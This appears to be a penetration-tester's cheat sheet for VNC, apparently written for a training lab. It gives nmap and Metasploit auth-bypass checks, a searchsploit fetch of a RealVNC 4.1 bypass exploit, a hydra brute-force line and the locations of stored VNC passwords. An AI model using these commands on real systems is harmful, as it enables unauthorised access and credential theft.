VNC 5800 5900

#nmap

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5800 10.11.1.13

#metasploit

use auxiliary/scanner/vnc/vnc_none_auth set rhosts 10.11.1.13 set rport 5800 set threads 1 run

#RealVNC 4.1.0/4.1.1 - Authentication Bypass - Exploit will prompt for target IP

sudo searchsploit -m windows/remote/36932.py

python2 36932.py #input target IP

Shell

#hydra

hydra -L <USERS_LIST> –P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV

#Password default location

Linux
Default password is stored in: ~/.vnc/passwd

Windows
# RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver

# TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server

# TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4

# UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini